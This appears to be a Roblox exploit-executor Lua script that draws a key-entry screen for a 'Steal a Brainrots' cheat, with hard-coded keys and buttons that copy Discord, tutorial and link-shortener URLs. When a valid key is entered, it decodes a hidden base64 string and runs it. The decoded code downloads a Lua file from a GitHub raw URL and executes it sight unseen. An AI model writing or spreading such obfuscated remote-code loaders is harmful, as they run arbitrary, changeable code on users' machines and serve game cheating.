local Players = game:GetService("Players")
local Lighting = game:GetService("Lighting")
local LocalPlayer = Players.LocalPlayer

local validKeys = {
  "BRAIN-5XG1Q","BRAIN-7LK9D","BRAIN-2PM8Z","BRAIN-XQ4A1","BRAIN-9TY3V",
  "BRAIN-MK7P2","BRAIN-4QZ8F","BRAIN-1L2KC","BRAIN-6ZD3X","BRAIN-VQ9N5",
  "BRAIN-LP5A8","BRAIN-JX3QB","BRAIN-N4F2M","BRAIN-Y8ZQ1","BRAIN-B9T7K",
  "BRAIN-QX6VP","BRAIN-3Y2LR","BRAIN-A5K9P","BRAIN-ZQ1ND","BRAIN-PX4J8"
}

local usedKeys = {}

local discordLink = "https://discord.gg/8uJDJaYNvw"
local tutorialLink = "https://youtu.be/Y9mDOgGg2C0"
local keyLink = "https://lootdest.org/s?Ti8W0KKP"

local gui = Instance.new("ScreenGui", LocalPlayer:WaitForChild("PlayerGui"))
gui.Name = "BRAINUI"
gui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

local blur = Instance.new("BlurEffect")
blur.Size = 10
blur.Name = "BrainBlur"
blur.Parent = Lighting

local function closeUI()
	if Lighting:FindFirstChild("BrainBlur") then
		Lighting.BrainBlur:Destroy()
	end
	gui:Destroy()
end

-- UI Frame
local frame = Instance.new("Frame", gui)
frame.Size = UDim2.new(0, 340, 0, 370)
frame.Position = UDim2.new(0.5, -170, 0.5, -185)
frame.BackgroundColor3 = Color3.fromRGB(25, 25, 35)
frame.BackgroundTransparency = 0.05
frame.Active = true
frame.Draggable = true

Instance.new("UICorner", frame).CornerRadius = UDim.new(0, 12)
local stroke = Instance.new("UIStroke", frame)
stroke.Color = Color3.fromRGB(100, 0, 255)
stroke.Thickness = 2
stroke.Transparency = 0.1

-- Avatar
local avatar = Instance.new("ImageLabel", frame)
avatar.Size = UDim2.new(0, 70, 0, 70)
avatar.Position = UDim2.new(0.5, -35, 0, 10)
avatar.BackgroundTransparency = 1
avatar.Image = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. LocalPlayer.UserId .. "&width=100&height=100&format=png"

-- Title
local title = Instance.new("TextLabel", frame)
title.Size = UDim2.new(1, -20, 0, 30)
title.Position = UDim2.new(0, 10, 0, 85)
title.Text = "🧠 STEAL A BRAINROTS KEY SYSTEM"
title.Font = Enum.Font.GothamBold
title.TextSize = 18
title.TextColor3 = Color3.fromRGB(255, 255, 255)
title.BackgroundTransparency = 1

-- Key Input
local keyBox = Instance.new("TextBox", frame)
keyBox.Size = UDim2.new(0.8, 0, 0, 38)
keyBox.Position = UDim2.new(0.1, 0, 0, 125)
keyBox.PlaceholderText = "Enter your key here..."
keyBox.Font = Enum.Font.Gotham
keyBox.TextSize = 16
keyBox.Text = ""
keyBox.BackgroundColor3 = Color3.fromRGB(35, 35, 50)
keyBox.TextColor3 = Color3.fromRGB(255, 255, 255)
Instance.new("UICorner", keyBox).CornerRadius = UDim.new(0, 8)

-- Verify Key Button
local verifyBtn = Instance.new("TextButton", frame)
verifyBtn.Size = UDim2.new(0.8, 0, 0, 38)
verifyBtn.Position = UDim2.new(0.1, 0, 0, 175)
verifyBtn.Text = "🔒 Verify Key"
verifyBtn.Font = Enum.Font.GothamBold
verifyBtn.TextSize = 16
verifyBtn.BackgroundColor3 = Color3.fromRGB(140, 40, 200)
verifyBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
Instance.new("UICorner", verifyBtn).CornerRadius = UDim.new(0, 8)

-- Get Key
local getKeyBtn = Instance.new("TextButton", frame)
getKeyBtn.Size = UDim2.new(0.8, 0, 0, 34)
getKeyBtn.Position = UDim2.new(0.1, 0, 0, 225)
getKeyBtn.Text = "🧠 Get Key"
getKeyBtn.Font = Enum.Font.Gotham
getKeyBtn.TextSize = 14
getKeyBtn.BackgroundColor3 = Color3.fromRGB(30, 30, 45)
getKeyBtn.TextColor3 = Color3.fromRGB(200, 200, 255)
Instance.new("UICorner", getKeyBtn).CornerRadius = UDim.new(0, 8)

-- Tutorial
local tutorialBtn = Instance.new("TextButton", frame)
tutorialBtn.Size = UDim2.new(0.8, 0, 0, 34)
tutorialBtn.Position = UDim2.new(0.1, 0, 0, 270)
tutorialBtn.Text = "📘 Key Tutorial"
tutorialBtn.Font = Enum.Font.Gotham
tutorialBtn.TextSize = 14
tutorialBtn.BackgroundColor3 = Color3.fromRGB(30, 30, 45)
tutorialBtn.TextColor3 = Color3.fromRGB(200, 200, 255)
Instance.new("UICorner", tutorialBtn).CornerRadius = UDim.new(0, 8)

-- Discord
local discordBtn = Instance.new("TextButton", frame)
discordBtn.Size = UDim2.new(0.8, 0, 0, 34)
discordBtn.Position = UDim2.new(0.1, 0, 0, 315)
discordBtn.Text = "💬 Join Discord"
discordBtn.Font = Enum.Font.Gotham
discordBtn.TextSize = 14
discordBtn.BackgroundColor3 = Color3.fromRGB(30, 30, 45)
discordBtn.TextColor3 = Color3.fromRGB(150, 200, 255)
Instance.new("UICorner", discordBtn).CornerRadius = UDim.new(0, 8)

-- Close Button
local closeBtn = Instance.new("TextButton", frame)
closeBtn.Size = UDim2.new(0, 26, 0, 26)
closeBtn.Position = UDim2.new(1, -36, 0, 10)
closeBtn.Text = "X"
closeBtn.Font = Enum.Font.GothamBold
closeBtn.TextSize = 14
closeBtn.BackgroundColor3 = Color3.fromRGB(50, 50, 60)
closeBtn.TextColor3 = Color3.fromRGB(255, 80, 80)
Instance.new("UICorner", closeBtn).CornerRadius = UDim.new(1, 0)

-- Notification Label
local notif = Instance.new("TextLabel", gui)
notif.Size = UDim2.new(0, 250, 0, 30)
notif.Position = UDim2.new(0.5, -125, 1, -60)
notif.BackgroundColor3 = Color3.fromRGB(30, 30, 40)
notif.Text = ""
notif.TextSize = 14
notif.Font = Enum.Font.Gotham
notif.TextColor3 = Color3.fromRGB(255, 255, 255)
notif.Visible = false
Instance.new("UICorner", notif).CornerRadius = UDim.new(0, 8)

-- Mostrar mensajes
local function showMessage(msg, duration)
	notif.Text = msg
	notif.Visible = true
	notif.BackgroundTransparency = 0.2
	notif.TextTransparency = 0
	notif:TweenPosition(UDim2.new(0.5, -125, 1, -90), "Out", "Quad", 0.3, true)
	task.wait(duration or 2)
	notif:TweenPosition(UDim2.new(0.5, -125, 1, -60), "Out", "Quad", 0.3, true)
	notif.Visible = false
end

-- FUNCIONES AUXILIARES
local function decode(data)
	local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
	data = string.gsub(data, '[^'..b..'=]', '')
	return (data:gsub('.', function(x)
		if x == '=' then return '' end
		local r,f='',(b:find(x)-1)
		for i=6,1,-1 do r=r..(f%2^i - f%2^(i-1) > 0 and '1' or '0') end
		return r;
	end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x)
		if #x ~= 8 then return '' end
		local c=0
		for i=1,8 do c=c + (x:sub(i,i)=='1' and 2^(8-i) or 0) end
		return string.char(c)
	end))
end

-- VERIFICAR CLAVE Y CARGAR SCRIPT
verifyBtn.MouseButton1Click:Connect(function()
	local inputKey = keyBox.Text
	if usedKeys[LocalPlayer.UserId] then
		showMessage("✅ You already used a key.")
	else
		local valid = false
		for i, key in ipairs(validKeys) do
			if inputKey == key then
				valid = true
				table.remove(validKeys, i)
				usedKeys[LocalPlayer.UserId] = true
				showMessage("🧠 Access granted.")
				closeUI()

				-- SCRIPT OFUSCADO (incrustado)
				local data = "bG9jYWwgcmVzcG9uc2UgPSBnYW1lOkh0dHBHZXQoImh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS90aWVua2hhbmgxL3NwaWN5L21haW4vQ2hpbGxpLmx1YSIpCmxvYWRzdHJpbmcocmVzcG9uc2UpKCk="
				loadstring(decode(data))()

				break
			end
		end
		if not valid then
			verifyBtn.Text = "❌ Invalid Key"
			task.wait(1)
			verifyBtn.Text = "🔒 Verify Key"
		end
	end
end)

-- BOTONES AUXILIARES
getKeyBtn.MouseButton1Click:Connect(function()
	setclipboard(keyLink)
	showMessage("📋 Key link copied to clipboard.", 4)
end)

tutorialBtn.MouseButton1Click:Connect(function()
	setclipboard(tutorialLink)
	showMessage("📋 Tutorial link copied.", 3)
end)

discordBtn.MouseButton1Click:Connect(function()
	setclipboard(discordLink)
	showMessage("📋 Discord link copied.")
end)

closeBtn.MouseButton1Click:Connect(function()
	closeUI()
end)
